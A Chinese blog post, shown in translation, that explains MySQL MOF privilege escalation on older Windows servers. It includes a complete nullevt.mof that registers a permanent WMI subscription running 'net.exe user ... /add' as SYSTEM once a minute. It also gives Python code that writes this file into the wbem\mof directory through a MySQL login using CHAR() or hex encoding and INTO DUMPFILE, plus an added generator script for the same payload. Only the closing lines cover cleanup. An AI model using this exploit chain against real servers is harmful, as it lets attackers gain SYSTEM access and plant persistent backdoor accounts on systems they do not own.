I happened to come across the MOF method of MySQL privilege escalation and, having some free time, looked into it. Many of the write-ups online are not detailed enough, and I got stuck for a while myself, so here is what worked.
Prerequisites:
The operating system is Windows.
The Windows version must not be too new: Server 2008 fails in testing, Server 2003 (and XP) works, because the technique relies on the WMI service auto-compiling files dropped into C:\windows\system32\wbem\mof, and the account MySQL runs as must be able to write to that directory.
The database is MySQL, you know the MySQL login password and remote connections are allowed (the same should work through SQL injection or a webshell, but I have not tried that).
A brief introduction first (partly excerpted from the web, partly from my own testing):
A nullevt.mof file placed in C:\windows\system32\wbem\mof is compiled automatically by the WMI service and removed from the directory. Compiling it registers a permanent event subscription in the WMI repository, so the consumer keeps firing even if no new file is ever written: with the query below it fires once a minute, whenever Win32_LocalTime.Second reaches 5 (not every five seconds, as some write-ups claim). The attacker therefore only has to get the malicious MOF into that directory once.
The nullevt.mof code that circulates online (reformatted; it defines a filter, a JScript consumer, and the binding between them):

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user xxx xxx /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
The usual procedure is as follows:
Upload the file anywhere on the server, under any name.
Through MySQL, run: select load_file('<path of the uploaded file>') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof'
INTO DUMPFILE writes the raw bytes with no escaping and no trailing newline, which is what a MOF file needs. Two things can make the write fail even with a valid password: the MySQL service account lacking write access to wbem\mof (see the prerequisites), and secure_file_priv being set, in which case MySQL refuses to write outside that directory (check it first with select @@secure_file_priv).
If the write succeeds, the code embedded in the file runs after a short wait (the filter fires when the clock's seconds value is 5, so at most about a minute).
Personally I find uploading a file too troublesome; you can write the content directly with select '...' into dumpfile. After some trial and error, transcoding the content before sending the query works. Part of the Python code is given as a demonstration.
The trick is MySQL's char() function, which rebuilds the file byte for byte from a list of decimal codes:

import pymysql  # assumed driver; the original snippet only shows an already-open connection `conn`

# The same MOF as above; xxxx/xxx are the account name and password to create
payload = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user xxxx xxx /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''

# Turn every character into its decimal code so MySQL's char() can rebuild the file byte for byte
ascii_payload = ''
for each_chr in payload:
    ascii_payload += str(ord(each_chr)) + ','
ascii_payload = ascii_payload[:-1]  # drop the trailing comma

conn = pymysql.connect(host='TARGET_HOST', user='root', password='MYSQL_PASSWORD')  # placeholders
cur = conn.cursor()
sql = "select char(%s) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'" % ascii_payload
cur.execute(sql)
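As an added example (this is not code from the original post), the following Python puts the whole delivery step together: it builds the MOF from the post with the account to create filled in, encodes it both ways MySQL can carry a binary file (the CHAR() list the post uses, and a hex literal, which is shorter on the wire), assembles the INTO DUMPFILE statement, and checks offline that decoding the CHAR() list gives back exactly the MOF bytes. The function names, the __USER__/__PASS__/__SECOND__ placeholders and the PREFLIGHT_SQL list are this example's own assumptions; nothing here connects to a database.

```python
# Added example, not from the original post: generate the nullevt.mof payload,
# encode it for delivery through MySQL, and verify the encoding offline.
# Function names and placeholders are this example's own; nothing connects to a
# database, and the target path is the XP / Server 2003 auto-compile directory.

MOF_PATH = "c:/windows/system32/wbem/mof/nullevt.mof"

# Same subscription as the post; __USER__/__PASS__/__SECOND__ are filled in below.
MOF_TEMPLATE = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = __SECOND__";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user __USER__ __PASS__ /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''

# Queries worth running before the write: INTO DUMPFILE is refused outside
# secure_file_priv when that variable is set, and the path only makes sense on Windows.
PREFLIGHT_SQL = (
    "SELECT @@secure_file_priv",
    "SELECT @@version_compile_os",
)


def build_mof(username, password, second=5):
    """Fill the template. The filter matches once per minute, when
    Win32_LocalTime.Second equals `second`, for as long as the subscription
    stays in the WMI repository."""
    if not 0 <= second <= 59:
        raise ValueError("second must be 0..59")
    for value in (username, password):
        if not value.isalnum():
            # keeps the value safe inside both the JScript string and net.exe's arguments
            raise ValueError("use an alphanumeric value: %r" % value)
    return (MOF_TEMPLATE.replace("__USER__", username)
                        .replace("__PASS__", password)
                        .replace("__SECOND__", str(second)))


def to_char_expr(data):
    """CHAR(n,n,...) expression that MySQL evaluates to `data` byte for byte
    (the post's technique). The MOF is plain ASCII, so one number per byte."""
    if isinstance(data, str):
        data = data.encode("ascii")
    return "CHAR(%s)" % ",".join(str(b) for b in data)


def to_hex_literal(data):
    """Alternative encoding: a hex literal (0x...) is a binary string in MySQL
    and is shorter than the CHAR() list."""
    if isinstance(data, str):
        data = data.encode("ascii")
    return "0x" + data.hex()


def build_dumpfile_sql(expr, path=MOF_PATH):
    """SELECT <expr> INTO DUMPFILE writes the raw bytes with no escaping or
    trailing newline, which is why it is used instead of INTO OUTFILE.
    Forward slashes avoid MySQL's backslash escaping inside the string literal."""
    if "'" in path or "\\" in path:
        raise ValueError("use a forward-slash path without quotes")
    return "SELECT %s INTO DUMPFILE '%s'" % (expr, path)


def decode_char_expr(expr):
    """Inverse of to_char_expr, used to check that the file MySQL would write
    is exactly the MOF we built."""
    if not (expr.startswith("CHAR(") and expr.endswith(")")):
        raise ValueError("not a CHAR() expression")
    return bytes(int(n) for n in expr[5:-1].split(","))


if __name__ == "__main__":
    mof = build_mof("xxx", "xxx")
    char_sql = build_dumpfile_sql(to_char_expr(mof))
    hex_sql = build_dumpfile_sql(to_hex_literal(mof))
    assert decode_char_expr(to_char_expr(mof)) == mof.encode("ascii")
    print("\n".join(PREFLIGHT_SQL))
    print(char_sql)
    print(hex_sql)
```

The round-trip check matters in practice: a single wrong byte (a smart quote picked up from a web page, a stray space inside a backslash escape, as in the garbled copies of this MOF that circulate) makes mofcomp reject the file silently, and the only symptom is that no account ever appears.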
Since the MOF is compiled and its consumer is run by the WMI service itself, which runs as SYSTEM, the privileges are enough to create a user, add it to the administrators group, and so on, which completes the privilege escalation.
If the server's operator finds that MOF has been used for privilege escalation, how do you stop the loop that keeps re-creating the account? Open cmd and run:

net stop winmgmt

then delete the contents of the folder C:\windows\system32\wbem\repository, and run

net start winmgmt

That does it. Note that this discards the whole WMI repository, including every other registered subscription (WMI rebuilds the repository when the service restarts); a more surgical cleanup is to remove just the __EventFilter named filtP2, the ActiveScriptEventConsumer named consPCSV2 and their __FilterToConsumerBinding from the root\subscription namespace. Either way, the account that net.exe already created has to be deleted separately.
If anything above is wrong, please point it out.
This article is from the "z2p blog"; if you repost it, keep this source: http://z2ppp.blog.51cto.com/11186185/1975985
A study of MySQL MOF privilege escalation